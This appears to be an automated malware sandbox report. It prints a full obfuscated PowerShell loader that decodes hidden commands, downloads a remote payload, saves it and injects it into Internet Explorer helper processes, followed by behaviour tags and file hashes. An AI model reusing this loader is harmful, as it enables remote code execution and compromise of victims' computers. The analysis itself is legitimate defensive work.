3a5RE 3 DP1E1V0b2 0 3R1E8R1h1 1DCE2 DI4MAE4TAK3S7 1T5 0i4H3I4 1S5m1 CR1T5T1 7S1 1B0 4D1p5C3S6U1GF 0 2 3 6C0u5B1 EN1 3D0 4 1 9P1 F 1 ET2 0 1PF 1 9n1 E 0C4 1P5 0S2F5L8M5F8 1D6L1 B 0 0 5 0D5M4I2 3B1 B 0C9 1 C 1 9 0S4S1TEZ1 5S1 FS5 0S5G4I2 8 0C9 1 CM1hFL1 7L0G2I1A1P1T6P1S9 1 5 4 0 4 3m5C9 5LCI5M0 5 8I3s7D3 4 2 4K5H0 3M0 5 8 2JBP3G9 1 EK0E4T2i0R0K4U0A2T2FDS5 9K5 0r5M8C2 B 3 9 1 E 0l4 2A0 0 4 0p2 2 D 5B9w5I9 5F9 ' ; .P( `$WAFn s kDuSeD7 )H `$ X yLl oMg rBaBfLiNeW0U2C; `$ARVeSa l i tn7 =B TX ySlAoBgNrGaBfTiAe 1N1U 'U5C4b3 DR1 FN1H4G1P8 1F1A5R0O4RD 5 0G5 4S2 6s1N5P1C4 1ABO1 5P5 EB3 9 1UEr0 6 1 FT1 B 1M5E5 8S4N0 5S9e' ; . (S`$DA nisfk uUeK7N) r`$ R e a lTi t 7 ;e`$bRVeCa l iCtj7 =H XEyGlSo gSr aDf iIeT1F1 F' 5B4 3D6 1N5R0 2 0 6 1 9O1 4q5 EK3 9u1AE 0 6S1AFP1 BK1R5W5 8H5 4 3IDM1AFO1S4 1 8F1 1r5 C 5 0 4 0 5V9A' ; . (C`$ AFn sSkAu e 7S)r `$TR eMaUlai ti7 ; `$BRDeTaHl iMtG6U V=l BX y lFo gBr a fiiMe 1P1U s' 5H4S2L0 1 5I0O2U0 3S0 0S5 0E4 DS5H0L2 BD2 3A0H9I0 3I0P4s1P5P1IDO5UE 2G2S0V5C1 EF0Z4R1D9N1 DA1C5G5TE 3S9 1BEL0 4 1T5 0P2 1mFM0S0P2H3 1 5 0V2 0 6F1 9C1 3A1J5S0D3 5 Eo3FDU1E1 0 2 0 3 1 8N1 1E1AC 2EDS4 AM4MA 3L7P1L5 0 4R3K4B1a5r1MCF1 5 1 7 1 1D0p4 1 5J3 6M1AFJ0C2 3T6 0G5 1TEU1t3 0 4 1 9 1SFB1 ET2 0U1SF 1 9C1 E 0V4O1S5B0 2L5P8 5F8V1K6S1IBS0P0C5T0 5G4U2 3 1SBT0 9F1iCl1D9 0B4 1PE 1 5F1PF 5S0d5 4 3 1 1EET0S3 1IBm0G5k1S5S4B4L5 9 5TCS5 0 5T8S3M7 3 4 2H4B5M0 3 0 5S8d2LB 3F9F1 EH0R4B2S0E0C4U0S2 2OD 5 CP5f0 2BB 2K5S3 9 1REN0R4R4H3 4B2D2 D 5 C 5d0C2 Bs2 5S3 9N1AE 0S4P4 3 4T2H2 D 5 C 5 0N2 B 2T5 3 9F1 EV0K4a4S3 4 2 2uDP5 9S5 0 5U8A2KBR3 9D1 EL0G4 2 0W0 4 0A2C2 DF5d9B5 9R5 9 'D;S. (F`$TA nFsPkSu eP7K) P`$ R eFaOl iGt 6 ; `$ UBn p r eSauc = AfSk p G`$UAKnFsUkSu eR5A `$ A nCs k uCeH6u;M`$TROe aRlai tK7T S=C WXsyNlUoDgAr aEfAiTeS1S1 'F5 4 0W0K1F9 0D4H1V6 1 9 1P5 4S3 5S0 4 DC5A0i5E4R2 0 1 5B0 2 0V3 0 0 5UEK3H9b1AE 0B6 1HFT1CB 1U5c5C8 2BBH3p9 1TE 0 4C2 0R0T4M0e2S2UDS4HAS4 AU2 A 1 5R0 2 1 FJ5ECT5 0 4M6T4 6T4 3P5LCS5 0S4F0S0n8D4R3t4I0a4 0 4 0 5 C 5 0 4 0 0R8P4 4 4 0 5 9T'O;O. 
(I`$ AGn sNkTu e 7 )F `$ RDeha lCi tU7 ;P`$ RSe aPlsift 8 F=P AX yRl oVgSraa fSi eZ1B1R 'O5O4 3LD 0E5I1 C 0B4V1O9 1S7 0 2 1 1 1 E 5S0 4SDB5 0 5R4 2T0m1 5T0 2P0A3 0 0C5IEU3 9S1 E 0G6P1PFB1 BD1 5T5 8F2 B 3 9U1KE 0 4I2B0K0 4 0A2c2 D 4BAL4RAT2lAF1P5S0 2C1 FB5oC 5D0U4L2D4H2B4 2 4S1S4s2U4N6 4 0 4T8F5 C 5I0F4 0a0C8U4 3 4w0 4 0M4 0B5 CS5O0M4 0S0O8 4S4R5N9K'P;E.c(S`$ A nUs kTuBeA7D) H`$CRFeHaMlTi tB8F;L`$ XKyIlUo g rGaSfBi eJ0U1 S=S AXiyDlGoMgKrAaPf iLe 1 1T 'F1 8p0 4T0O4E0 0G4 A 5BF 5IFD0 2L1 FB1LFC0Y4i1 DS1 1V1 9 1RC 4S1 4 2 4 3H5AE 1 7L1 9R0 4P1 8M0R5S1e2F5 E 1V9S1 FM5GF 3RDP0u9 2B3 1 9a0 4V1 5P5 FW2R4 1 1U1 C 1S5 0P3 1SDC5 E 0 5O4S3b4S2T'V;T`$KXDy l oRg r a f i eE0U0 =S XGy lEo gFrOaEf iPeF1 1M 'U5S4V2 2 1e5 1K4P1V9S0 2S5S0 4GDS5K0 5 8H3 EH1P5 0D7F5 DB3 F 1 2M1 AO1C5A1d3B0C4P5I0 3 EA1M5 0T4 5 Es2 7 1d5 1O2I3 3P1ECc1E9 1 5M1IEF0 4R5 9 5WE 3F4I1 F 0M7B1TE 1 CF1SFV1F1i1F4 2E3F0 4D0 2 1 9 1IEP1 7R5 8 5 4S2L8R0 9 1 CC1DFM1T7R0M2 1T1S1Y6 1 9B1 5 4B0 4S1A5 9F' ; `$KRFe aElRist 8 F=M NXHy lFo gTrPaEfTiPe 1S1 'I5 4 0 0S1 9f0 4T1S6 1S9 1O5 4 2 4 DM5 4 1S5 1BE 0S6S4DAS1 1S0G0 0R0 1L4 1E1D0S4M1 1O'H; .Y( `$ AKnAs k uIe 7 ) U`$ER e a lAi t 8 ; `$NpSiTtUfNi eh2N= `$PpUi tMf i eR2B+I'S\ AAumg u sAtOeFpArS.FCRa mS'U;K`$ARPeSdOi rG= 'K' ; iCfM B(U-BnFo t (HTFe sNt -OPTa t hE M`$ p iUtSf iSe 2I) )D b{ wIh iSlceI c( `$ R e d iUr -Ge q 'a'D)G C{C. 
(T`$AAJn s kSuHeT7 )S O`$UX yPlHo gMrKaSfRiTe 0A0F;FSTtaa r tD-TSAlCeTe pO 5G; } SSeztA- CFoJnEt eNnAtV `$SpFi t fPiPeS2F P`$ RAefdKi rH;T} `$RRSe dBiNr =F WGUeDtB- C oUnDtBeAnIt `$GpAi tKfUiFeM2P;P`$ RDe a lSi tD9 C=T XayAlEo gBrSa f i e 1 1P A' 5p4O2B2I1 5 1 1 1 Cr1 9s0S4V5 0M4 DI5I0 2BBA2 3P0H9U0E3 0 4 1 5U1RDH5TEF3L3 1AFT1 E 0N6G1V5 0 2 0B4H2 DP4 AS4 A 3A6C0F2 1eFr1ADS3D2T1P1F0W3 1M5F4f6B4F4H2 3A0 4h0 2 1b9 1 E 1 7K5M8B5G4I2 2 1 5T1E4S1B9 0K2r5 9S' ; .C(R`$BA nTsMk ueeS7 ) E`$SRAeKa lOiotL9 ;K`$ REeSd iKrV0 =i XByFlUo g r a f iRe 1 1 C'M2fBT2S3C0M9A0S3 0 4 1 5W1CD 5 E 2 2S0 5F1LES0M4U1 9H1PDE1 5B5 EL3 9E1 EV0M4U1 5 0 2 1UF 0 0P2 3C1 5P0N2 0T6 1M9T1 3p1M5M0P3 5GEA3ND 1 1 0E2A0 3A1U8 1S1C1 C 2jD 4PA 4 A 3 3A1MFF0E0T0 9 5 8 5H4F2 2r1 5S1T1h1SCC1 9 0F4B5FCM5l0 4 0 5MCK5 0B5A0S5 4 0F0I1 9S0 4M1 6 1k9 1S5 4C3I5 C 5N0 4T6H4 6 4 3 5 9 ' ; . ( `$PAPn sBk uCeS7 ) `$BRCeMd i rK0F; `$Ss c eCn aVrDiBu mVsU=p`$FRBeWaWlPiRtI.FcKoFuAnFt -O6 6 3D;C`$VRHe dci r 1 M=B X y lHosg rOa f i e 1 1K P' 2 BK2 3S0I9 0 3 0M4 1B5H1SDM5BET2R2S0 5U1 E 0L4 1 9F1 DS1 5S5 E 3 9 1SEO0L4N1F5C0 2K1 F 0b0 2P3 1H5 0U2O0V6 1F9T1F3O1 5K0 3 5SEI3 DR1e1K0t2 0 3 1G8F1B1 1YCS2 DB4GAg4 AR3P3S1DFL0 0A0 9 5T8 5d4A2 2P1L5b1 1o1 C 1 9T0A4 5CCO5 0 4A6 4E6 4 3 5 CK5U0 5 4 3FDT0U5E1PC 0H4I1D9 1 7 0C2b1C1m1PED5ECT5M0O5 4I0S3U1M3 1 5N1OEU1 1R0 2 1U9 0 5 1 D 0k3S5 9D'T;B.A(G`$KA n s k uReR7d)V `$MRJeCd i rU1 ;D`$SRseMd iTrO2T B= X yVl o gLrPaAf iSeS1f1G s'P5 4A3 ES1SFD1 E 0 3G1 3E1F5T1 ED5O0B4TD 5 0K2 BS2A3F0 9 0Q3S0 4S1 5 1HD 5DE 2R2C0 5S1UEC0 4L1F9N1GDS1 5B5OEC3 9U1WEF0 4G1 5B0 2r1 FI0A0 2 3 1B5K0 2R0F6 1 9S1D3 1 5 0N3T5IET3 Dr1S1 0G2S0 3Z1s8R1B1 1 CS2 D 4 AF4 AF3V7 1T5K0S4 3 4A1C5S1 CA1 5U1H7M1 1B0s4D1 5G3C6K1RF 0K2O3 6S0 5P1 E 1 3s0E4 1V9P1 F 1UEJ2 0 1DF 1U9 1LE 0 4A1U5N0R2U5 8F5 8 1S6 1 B 0F0 5E0 5T4 2W5 1 4A0S3V0T0S1S1G0S2 1 5 1TEC1 4s5S0 5 4P3L8 1M1 0b6S1 5G0U2 5K9m5rC 5 0P5F8R3 7 3L4C2T4 5 0 3s0S5 8 2RBB3P9o1 EF0 4 2P0 0 4S0A2F2 D 5uC 5S0S2FBA3 9 1SEI0N4B2P0D0R4S0P2 2 DK5 C 5 0R2 B 3O9f1 EL0R4D2B0h0 4 0 
2F2ADI5HC 5S0 2nB 3T9 1TE 0 4 2s0A0 4 0C2 2SDM5TC 5 0T2 B 3M9S1 E 0F4A2 0S0 4 0 2B2aDh5I9S5B0M5i8 2MB 3 9R1 EE0O4 2 0 0 4U0 2 2ODB5B9D5A9 5S9W'S; . (W`$ ALn s k u e 7 )T `$ARCeJdSiFrs2A; `$CRDeDd isr 3 N=V DXMyTlPoRg r aFfBiUe 1V1 'P5O4 3SEM1 F 1EEM0S3K1 3 1U5 1WE 5KEH3 9n1FEF0O6 1 FS1RBS1 5O5m8F5W4 0 0 1P9C0G4 1 6S1W9N1 5M4 3S5 C 5F4H3 DS0 5C1BCK0 4L1 9M1 7O0T2 1O1T1 EA5BC 5A4B2 5O1 Et0S0A0 2B1K5F1C1 1e3O5BC 4G0P5 C 4K0K5S9 'V; . ( `$ AHnssCk uDe 7Y)I V`$AR ePdSiMr 3N#U;""";Function Redir9 { param([String]$Gruneri); $Lokal = 's'+'ubstrin'+'g'; For($Tamk=1; $Tamk -lt $Gruneri.Length-1; $Tamk+=(1+1)){$Xylografie = $Xylografie + $Gruneri.$Lokal.Invoke($Tamk, 1)}; $Xylografie;}$Contai0 = Redir9 ' I EDX ';$Contai1= Redir9 $Tjen;if([IntPtr]::size -eq 8){.$env:systemroot\*ysw*64\*indo*ower*\v1.*\po*ll.exe $Contai1 ;}else{.$Contai0 $Contai1;}"
                                                3⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1940
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Xylografie11 { param([String]$Gruneri); $Dubsdeades = ''; Write-Host $Dubsdeades; Write-Host $Dubsdeades; Write-Host $Dubsdeades; $Letdownsg = New-Object byte[] ($Gruneri.Length / 2); For($Tamk=0; $Tamk -lt $Gruneri.Length; $Tamk+=2){ $Pyralidtap = 'sub'+'string'; $Engleligee = $Gruneri.$Pyralidtap.Invoke($Tamk, 2); $Letdownsg[$Tamk/2] = [convert]::ToByte($Engleligee, 16); $Sandsi = ($Letdownsg[$Tamk/2] -bxor 112); $Letdownsg[$Tamk/2] = $Sandsi; } [String][System.Text.Encoding]::ASCII.GetString($Letdownsg);}$Trias0=Xylografie11 '23090304151D5E141C1C';$Trias1=Xylografie11 '3D1913021F031F16045E27191E43425E251E031116153E11041906153D1504181F1403';$Trias2=Xylografie11 '37150420021F1331141402150303';$Trias3=Xylografie11 '23090304151D5E22051E04191D155E391E0415021F0023150206191315035E38111E141C15221516';$Trias4=Xylografie11 '030402191E17';$Trias5=Xylografie11 '3715043D1F14051C1538111E141C15';$Trias6=Xylografie11 '22242300151319111C3E111D155C503819141532092319175C502005121C1913';$Trias7=Xylografie11 '22051E04191D155C503D111E11171514';$Trias8=Xylografie11 '2215161C151304151434151C1517110415';$Trias9=Xylografie11 '391E3D151D1F02093D1F14051C15';$Anskue0=Xylografie11 '3D0934151C151711041524090015';$Anskue1=Xylografie11 '331C1103035C502005121C19135C502315111C15145C50311E0319331C1103035C503105041F331C110303';$Anskue2=Xylografie11 '391E061F1B15';$Anskue3=Xylografie11 '2005121C19135C503819141532092319175C503E1507231C1F045C502619020405111C';$Anskue4=Xylografie11 '2619020405111C311C1C1F13';$Anskue5=Xylografie11 '1E04141C1C';$Anskue6=Xylografie11 '3E0420021F041513042619020405111C3D151D1F0209';$Anskue7=Xylografie11 '393528';$Anskue8=Xylografie11 '2C';$Udsparend=Xylografie11 '252335224342';$Haver=Xylografie11 '33111C1C27191E141F0720021F1331';function fkp {Param ($Frem, $Plettendes) ;$Realit0 =Xylografie11 
'54201C1F0503191F1302504D50582B310000341F1D11191E2D4A4A33050202151E04341F1D11191E5E371504310303151D121C1915035859500C5027181502155D3F121A151304500B50542F5E371C1F12111C310303151D121C093311131815505D311E1450542F5E3C1F131104191F1E5E23001C19045854311E031B051548592B5D412D5E350105111C03585424021911034059500D595E37150424090015585424021911034159';.($Anskue7) $Realit0;$Realit5 = Xylografie11 '5434151D091E1F1E15504D5054201C1F0503191F13025E3715043D1504181F1458542402191103425C502B240900152B2D2D503058542402191103435C50542402191103445959';.($Anskue7) $Realit5;$Realit1 = Xylografie11 '02150405021E505434151D091E1F1E155E391E061F1B1558541E051C1C5C5030582B23090304151D5E22051E04191D155E391E0415021F0023150206191315035E38111E141C152215162D583E15075D3F121A1513045023090304151D5E22051E04191D155E391E0415021F0023150206191315035E38111E141C1522151658583E15075D3F121A15130450391E04200402595C505854201C1F0503191F13025E3715043D1504181F14585424021911034559595E391E061F1B1558541E051C1C5C503058543602151D595959595C5054201C150404151E1415035959';.($Anskue7) $Realit1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Zeline,[Parameter(Position = 1)] [Type] $Elendiges = [Void]);$Realit2 = Xylografie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nskue7) $Realit2;$Realit3 = Xylografie11 '5422151C1917191F5E341516191E15331F1E0304020513041F0258542402191103465C502B23090304151D5E2215161C151304191F1E5E33111C1C191E17331F1E06151E04191F1E032D4A4A2304111E141102145C50542A151C191E15595E231504391D001C151D151E041104191F1E361C111703585424021911034759';.($Anskue7) $Realit3;$Realit4 = Xylografie11 '5422151C1917191F5E341516191E153D1504181F145854311E031B0515425C5054311E031B0515435C5054351C151E14191715035C50542A151C191E15595E231504391D001C151D151E041104191F1E361C111703585424021911034759';.($Anskue7) $Realit4;$Realit5 = Xylografie11 '02150405021E505422151C1917191F5E330215110415240900155859';.($Anskue7) $Realit5 ;}$Skylitneo = Xylografie11 '1B15021E151C4342';$Xylografie03 = Xylografie11 
'371504331F1E031F1C1527191E141F07';$Xylografie00=Xylografie11 '23181F0727191E141F07';$Xylografie01 = Xylografie11 '54361502061914504D502B23090304151D5E22051E04191D155E391E0415021F0023150206191315035E3D11020318111C2D4A4A37150434151C1517110415361F0236051E1304191F1E201F191E0415025858161B005054251403001102151E14505428091C1F1702111619154040595C50583734245030582B391E042004022D5C502B25391E0443422D5950582B391E042004022D595959';.($Anskue7) $Xylografie01;$Xylografie02 = Xylografie11 '542615141B15504D502B23090304151D5E22051E04191D155E391E0415021F0023150206191315035E3D11020318111C2D4A4A37150434151C1517110415361F0236051E1304191F1E201F191E0415025858161B005054231B091C19041E151F505428091C1F1702111619154043595C50583734245030582B391E042004022D5950582B391E042004022D595959';.($Anskue7) $Xylografie02;$Realit7 = Xylografie11 '543D1F141811504D50542615141B155E391E061F1B15584059';.($Anskue7) $Realit7;$Realit7 = Xylografie11 '543615020619145E391E061F1B1558543D1F1418115C504059';.($Anskue7) $Realit7;$Realit6 = Xylografie11 '542015020300504D502B23090304151D5E22051E04191D155E391E0415021F0023150206191315035E3D11020318111C2D4A4A37150434151C1517110415361F0236051E1304191F1E201F191E0415025858161B005054231B091C19041E151F5054311E031B051544595C50583734245030582B391E042004022D5C502B25391E0443422D5C502B25391E0443422D5C502B25391E0443422D5950582B391E042004022D595959';.($Anskue7) $Realit6;$Unpreac = fkp $Anskue5 $Anskue6;$Realit7 = Xylografie11 '5400190416191543504D505420150203005E391E061F1B15582B391E042004022D4A4A2A15021F5C504646435C504008434040405C504008444059';.($Anskue7) $Realit7;$Realit8 = Xylografie11 '543D051C04191702111E504D505420150203005E391E061F1B15582B391E042004022D4A4A2A15021F5C5042424241424640485C504008434040405C5040084459';.($Anskue7) $Realit8;$Xylografie01 = Xylografie11 '180404004A5F5F021F1F041D11191C4142435E1719041805125E191F5F3D09231904155F24111C15031D5E054342';$Xylografie00 = Xylografie11 
'542215141902504D50583E15075D3F121A151304503E15045E271512331C19151E04595E341F071E1C1F1114230402191E17585428091C1F170211161915404159';$Realit8 = Xylografie11 '54001904161915424D54151E064A11000014110411';.($Anskue7) $Realit8;$pitfie2=$pitfie2+'\Augustepr.Cam';$Redir='';if (-not(Test-Path $pitfie2)) {while ($Redir -eq '') {.($Anskue7) $Xylografie00;Start-Sleep 5;}Set-Content $pitfie2 $Redir;}$Redir = Get-Content $pitfie2;$Realit9 = Xylografie11 '542215111C1904504D502B23090304151D5E331F1E061502042D4A4A36021F1D321103154644230402191E175854221514190259';.($Anskue7) $Realit9;$Redir0 = Xylografie11 '2B23090304151D5E22051E04191D155E391E0415021F0023150206191315035E3D11020318111C2D4A4A331F000958542215111C19045C50405C505054001904161915435C5046464359';.($Anskue7) $Redir0;$scenariums=$Realit.count-663;$Redir1 = Xylografie11 '2B23090304151D5E22051E04191D155E391E0415021F0023150206191315035E3D11020318111C2D4A4A331F000958542215111C19045C504646435C50543D051C04191702111E5C50540313151E110219051D0359';.($Anskue7) $Redir1;$Redir2 = Xylografie11 '543E1F1E0313151E504D502B23090304151D5E22051E04191D155E391E0415021F0023150206191315035E3D11020318111C2D4A4A37150434151C1517110415361F0236051E1304191F1E201F191E0415025858161B005054251403001102151E1450543811061502595C50583734245030582B391E042004022D5C502B391E042004022D5C502B391E042004022D5C502B391E042004022D5C502B391E042004022D5950582B391E042004022D595959';.($Anskue7) $Redir2;$Redir3 = Xylografie11 '543E1F1E0313151E5E391E061F1B155854001904161915435C543D051C04191702111E5C54251E00021511135C405C4059';.($Anskue7) $Redir3#"
                                                  4⤵
                                                  • Blocklisted process makes network request
                                                  • Checks QEMU agent file
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious use of SetThreadContext
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious behavior: MapViewOfSection
                                                  PID:2964
                                                  • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                    "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                    5⤵
                                                      PID:3404
                                                    • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                      "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                      5⤵
                                                        PID:3632
                                                      • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                        "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                        5⤵
                                                          PID:2256
                                                        • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                          "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                          5⤵
                                                            PID:1164
                                                          • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                            "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                            5⤵
                                                              PID:1120
                                                            • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                              "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                              5⤵
                                                                PID:1816
                                                              • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                                "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                                5⤵
                                                                  PID:2804
                                                                • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                                  "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                                  5⤵
                                                                    PID:4892
                                                                  • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                                    "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                                    5⤵
                                                                      PID:644
                                                                    • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                                      "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                                      5⤵
                                                                        PID:2232
                                                                      • C:\Program Files (x86)\internet explorer\ielowutil.exe
                                                                        "C:\Program Files (x86)\internet explorer\ielowutil.exe"
                                                                        5⤵
                                                                          PID:316
                                                                        • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                          5⤵
                                                                          • Checks QEMU agent file
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:3636
                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Error.pdf"
                                                                            6⤵
                                                                              PID:5024
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5860 --field-trial-handle=1880,i,10717540817134010294,10418383947785657875,131072 /prefetch:2
                                                                      2⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:1524
                                                                  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                    1⤵
                                                                      PID:1944
                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                      C:\Windows\system32\AUDIODG.EXE 0x41c 0x468
                                                                      1⤵
                                                                        PID:2128

                                                                      Network

                                                                            MITRE ATT&CK Enterprise v6

                                                                            Downloads

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\9c137115-3302-430b-b8bf-3fdf187798b3.tmp

                                                                              Filesize

                                                                              114KB

                                                                              MD5

                                                                              5ff494068b80a8103350f815cbbc554f

                                                                              SHA1

                                                                              b3467ac09614dfc4437cf040b10397ca19bbd448

                                                                              SHA256

                                                                              bab77fca8164ae3620ef0152e03d3cc5e50e215916d2bfc5ecd519f0dbfefa5e

                                                                              SHA512

                                                                              fedb3311edff750b951ee044be2db010228aa068ea9e4a491e0f91a02bbf6660a214c88179a4de0e7862ceeb847eaf251bff18e844e7efdf3066d651c5eafbfe

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                              Filesize

                                                                              168B

                                                                              MD5

                                                                              b20581dd1f003adb657a7b58cc042783

                                                                              SHA1

                                                                              87dd48250c51245333f1ff1398698e18692caa66

                                                                              SHA256

                                                                              5b8ba4ae2ef0237c346d44dbc1a3ead49995cea5ac0f4eb0079ccd56cfc5fc7b

                                                                              SHA512

                                                                              9c3644e196a075cbe4801c7df60528b7b4a6d5c1acfbe4eb077a911ae25739accfbf9704b2d6eb72a65e29d6d311f52642fa8dc7068f0fa543b1a1b3db59e1f4

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                              Filesize

                                                                              216B

                                                                              MD5

                                                                              fefefe7e56e2244dcd7464e3d620d445

                                                                              SHA1

                                                                              e77555dc0042ecbeea54a859081700de46afb4c9

                                                                              SHA256

                                                                              b1cd7c7aea42a23922bed0e5a8997ac0b0fd77691d3976caabcf118d7be236de

                                                                              SHA512

                                                                              15ec393c1be40cfd38375df17ed7fde163eea15c58c3fc7d612a68ced0d8a2044272b7805213ff466a43286e4311aacb0410ba9b4b874342b1b9abba9ce0de94

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                              Filesize

                                                                              120B

                                                                              MD5

                                                                              81397e02a08b1c746b8a26bc56a7f28f

                                                                              SHA1

                                                                              fcb404fcef11b34743f7f0a20a98fb0b1afcd869

                                                                              SHA256

                                                                              8960cd01987824398758c3e81000f74ad047c8b2c0dd2a8dc4bb9b34b8efcb31

                                                                              SHA512

                                                                              0241ad8bd441059a831f55acbdae51ee2ad0b8f67c734b609d17335bc0780b9c75822a960993da335149e2a0065080fe82c6f656f990511c39c15f1469bec0ed

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\Paths\MANIFEST-000001

                                                                              Filesize

                                                                              41B

                                                                              MD5

                                                                              5af87dfd673ba2115e2fcf5cfdb727ab

                                                                              SHA1

                                                                              d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                              SHA256

                                                                              f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                              SHA512

                                                                              de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\Origins\CURRENT

                                                                              Filesize

                                                                              16B

                                                                              MD5

                                                                              46295cac801e5d4857d09837238a6394

                                                                              SHA1

                                                                              44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                              SHA256

                                                                              0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                              SHA512

                                                                              8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                              Filesize

                                                                              3KB

                                                                              MD5

                                                                              3276044ef181e412946c2196af05954b

                                                                              SHA1

                                                                              a7454fe92ba4fa32463efe5be034795c0ffe5f8c

                                                                              SHA256

                                                                              771e8b521e28d68162d09caa8045b28c01bbf21732ce84d60b0a6104a7bc8882

                                                                              SHA512

                                                                              c3e01e5414c36bc074fa5849af52db5c53e4542cc88d03a8568137a2b5cf268bf27db3ed241c99e405df077d5f86724d6de991df5a6f4ebf08c4883b9744469e

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                              Filesize

                                                                              2KB

                                                                              MD5

                                                                              1906fd5626513ffa0237f951bc79f627

                                                                              SHA1

                                                                              75848f80ed6ef8ec40b425ef507af73db5f24bf9

                                                                              SHA256

                                                                              c41d2cd736c1539980f14fbf0e46838336373d7433416acad79728bef9dd6f0f

                                                                              SHA512

                                                                              c73382f98561f10eccbf920f4084d27333f1ecfe4d3bbe9fb9fcc4b7d0ae31b0d5e3bd271ec09356ac10b274cc03d5b5fcf6e4afa2cbc490db049b3b8b9a3976

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                              Filesize

                                                                              1KB

                                                                              MD5

                                                                              2a45b2e6d5047350eaf612793e876cf8

                                                                              SHA1

                                                                              0557da52bd7661e44368b6f466f85d4f66d81f5b

                                                                              SHA256

                                                                              6d9f8977998b74b4cccfa8b6973c34220012aafc9eeb1e6f80ce0ab673a4ab7e

                                                                              SHA512

                                                                              1c3f2c22615502b92d2491478f840a507b28959c37bed8f8bd96590dc41fb06d419ecb15b070b84c8680cf9ab32da88f16e9933bdb9c63423473c77a6a6d6711

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                              Filesize

                                                                              1KB

                                                                              MD5

                                                                              daf4a6d6c510d9032d8ddfb3483668ff

                                                                              SHA1

                                                                              a38659a076e262e6450b887dec6ecd7ac03787ae

                                                                              SHA256

                                                                              b6f33f36887eace6aff535a40731540c08ae8440d7cf20a3d2774339eec02530

                                                                              SHA512

                                                                              2d45a1b83e7c45f2af21b6201ff66c889a269497a32678ab0a3e9f2543408a2e7cf8fad5c37c9391ce49ae99c68aff7707379ad76298303c01318f3a067c6a09

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                              Filesize

                                                                              1KB

                                                                              MD5

                                                                              1d41af5e0cfa6a9dfc1d09c5218e6338

                                                                              SHA1

